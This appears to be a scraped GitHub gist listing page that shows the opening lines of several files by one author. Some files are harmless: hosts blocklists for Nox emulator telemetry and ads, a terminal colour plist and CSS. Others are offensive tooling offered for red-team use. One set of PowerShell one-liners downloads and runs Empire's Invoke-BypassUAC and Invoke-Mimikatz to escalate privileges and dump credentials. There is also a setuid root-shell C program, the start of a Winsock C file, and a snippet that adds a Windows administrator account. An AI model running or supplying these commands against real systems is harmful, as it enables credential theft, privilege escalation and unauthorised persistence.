127.1 8.bignox.com
127.1 alog.umeng.com
127.1 android.bignox.com
127.1 androiden.duapp.com
......
### -- You can download large list with addblock + malware block here --> https://gist.githubusercontent.com/h4rithd/f101ea5057cb582dec6a28bfddab14db/raw/87bd3944c99e48cc5e967372a840e4eb98d787af/h4rithd_blocklist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Android #Web #Windows #iOS | |
Developers only | |
#01 WhatsApp Group for any developers | |
whatsapp://chat?code=D5Wz8eo5Tnn0DPXCzSmPmI |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int main(void) | |
{ | |
setuid(0); | |
setgid(0); | |
printf("-----| by h4rithd.com |-----"); | |
system("/bin/sh"); | |
} | |
// gcc -o sroot sroot.c |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#-------------------- [ h4rithd_blocklist ] -------------------- | |
0.0.0.0 00000000.fls.doubleclick.net | |
0.0.0.0 0000000.fls.doubleclick.net | |
0.0.0.0 000000.fls.doubleclick.net | |
0.0.0.0 00000777.com | |
0.0.0.0 00000.fls.doubleclick.net | |
0.0.0.0 000038.chinae168.com | |
0.0.0.0 000-038.net.daraz.com | |
0.0.0.0 00007d09d7395677a73fbdad72a6e04b.clo.footprintdns.com | |
0.0.0.0 0.0.0.0.creative.hpyrdr.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
! | |
! Title: The Nox Blocklist | |
! Description: List of hosts to block all Nox spyware, telemetry, etc | |
! Homepage: http://h4rithd.com/ | |
! Last modified: 2023-03-13T15:52:40.087Z | |
! | |
! Compiled by @adguard/hostlist-compiler v1.0.12 | |
! | |
! | |
! Source name: The Nox blocklist |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<dict> | |
<key>ANSIBlackColor</key> | |
<data> | |
YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9iamVjdHMS | |
AAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGmCwwXHR4lVSRudWxs1Q0ODxAR | |
EhMUFRZcTlNDb21wb25lbnRzVU5TUkdCXE5TQ29sb3JTcGFjZV8QEk5TQ3VzdG9tQ29s | |
b3JTcGFjZVYkY2xhc3NHMCAwIDAgMUYwIDAgMAAQAYACgAXTGBEZGhscVU5TSUNDWU5T |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
body pre[class^="language-"]::before { | |
font-family: var(--font-default); | |
color: var(--text-muted); | |
font-size: var(--font-smaller); | |
font-weight: var(--font-semibold); | |
position: absolute; | |
right: 0.5em; | |
top: 0.5em; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <winsock2.h> | |
#include <windows.h> | |
#include <io.h> | |
#include <process.h> | |
#include <sys/types.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/* ================================================== */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
************************************************************************** | |
* * | |
* Created by Harith Dilshan (h4rithd.com) * | |
* * | |
* Purpose: * | |
* This script creates a new user on a Windows system and adds the * | |
* user to the Administrators group. * | |
* * | |
* Compile for 64-bit: * |
OlderNewer